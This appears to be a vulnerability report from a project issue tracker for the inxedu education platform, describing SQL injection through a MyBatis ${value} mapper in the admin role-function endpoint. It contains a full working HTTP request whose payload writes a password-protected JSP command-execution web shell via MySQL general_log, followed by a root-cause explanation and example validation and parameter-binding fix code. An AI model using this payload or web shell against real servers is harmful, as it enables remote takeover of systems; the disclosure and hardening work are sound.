因酷 / inxedu

SQL Injection-1

Open
Created on 2019-11-02 23:27

/inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/system/SysRoleMapper.xml

<insert id="createRoleFunction" parameterType="java.lang.String">
INSERT INTO SYS_ROLE_FUNCTION(<include refid="sys_role_function_column"/>)
VALUE ${value}
</insert>
/**
 * Create the role-to-function association
 * @param value
 */
public void createRoleFunction(String value);

Next, let's look at the access control.
After finding the function point, testing shows there is a problem.

POST /admin/sysrole/saveroelfunction/2 HTTP/1.1
Host: 127.0.0.1:82
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 412
Origin: http://127.0.0.1:82
Connection: close
Referer: http://127.0.0.1:82/admin/sysrole/showroleList
Cookie: admin-token=; JSESSIONID=1DAA0E6A98BEA115043F997A0E41C476; inxeduweb_user_login_=6f5e7edc20b24ce180089526ceeb093f; inxedulogin_sys_user_=inxedulogin_sys_user_1

functionIds=61%2C62%2C80%2C81%2C30%2C32%2C79); set global general_log='on';
SET global general_log_file='/tmp/test.jsp';
SELECT '<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>';#
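The root cause is the MyBatis `${value}` substitution in the mapper above: the request parameter is spliced into the INSERT as raw SQL text, so the `);` in the payload closes the VALUE clause and the rest runs as further statements. The Java below is an added example, not code from the inxedu project, showing the defender-side fix: validate `functionIds` as a strictly numeric list before it reaches the mapper, and bind each value with a placeholder (`#{}` in MyBatis, `?` in JDBC) so the payload from the request above is rejected before any SQL is built. The class, method, parameter and column names are assumptions; the role id 2 and the id list come from the request on this page.

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.regex.Pattern;

/** Hypothetical hardening for the createRoleFunction path (example code, not inxedu's). */
public final class RoleFunctionBinding {

    // Only comma-separated positive integers are acceptable. Quotes, parentheses,
    // semicolons and the "); set global general_log ..." tail from the issue all fail here.
    private static final Pattern ID_LIST = Pattern.compile("\\d{1,18}(,\\d{1,18})*");

    /** Parses "61,62,80" into [61, 62, 80]; throws on anything that is not a plain id list. */
    public static List<Long> parseFunctionIds(String raw) {
        if (raw == null || !ID_LIST.matcher(raw).matches()) {
            throw new IllegalArgumentException("functionIds must be a comma-separated list of integers");
        }
        List<Long> ids = new ArrayList<>();
        for (String part : raw.split(",")) {
            ids.add(Long.parseLong(part));
        }
        return Collections.unmodifiableList(ids);
    }

    /*
     * Equivalent MyBatis mapper (hypothetical replacement for the ${value} insert; column
     * names assumed). #{} binds each value as a parameter instead of pasting SQL text:
     *   <insert id="createRoleFunction">
     *     INSERT INTO SYS_ROLE_FUNCTION(ROLE_ID, FUNCTION_ID) VALUES
     *     <foreach collection="functionIds" item="fid" separator=",">(#{roleId}, #{fid})</foreach>
     *   </insert>
     */
    public static String buildInsertSql(int rowCount) {
        if (rowCount < 1) throw new IllegalArgumentException("no rows to insert");
        StringBuilder sql = new StringBuilder("INSERT INTO SYS_ROLE_FUNCTION(ROLE_ID, FUNCTION_ID) VALUES ");
        for (int i = 0; i < rowCount; i++) {
            sql.append(i == 0 ? "(?, ?)" : ", (?, ?)");   // values are bound separately
        }
        return sql.toString();
    }

    public static void main(String[] args) {
        // Legitimate input from the request above: role 2, seven function ids
        List<Long> ok = parseFunctionIds("61,62,80,81,30,32,79");
        System.out.println(buildInsertSql(ok.size()) + "  <- role 2, ids " + ok);

        // The injected form of the same parameter is refused before any SQL exists
        try {
            parseFunctionIds("61,62,80,81,30,32,79); set global general_log='on';#");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```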

zhangsan created the task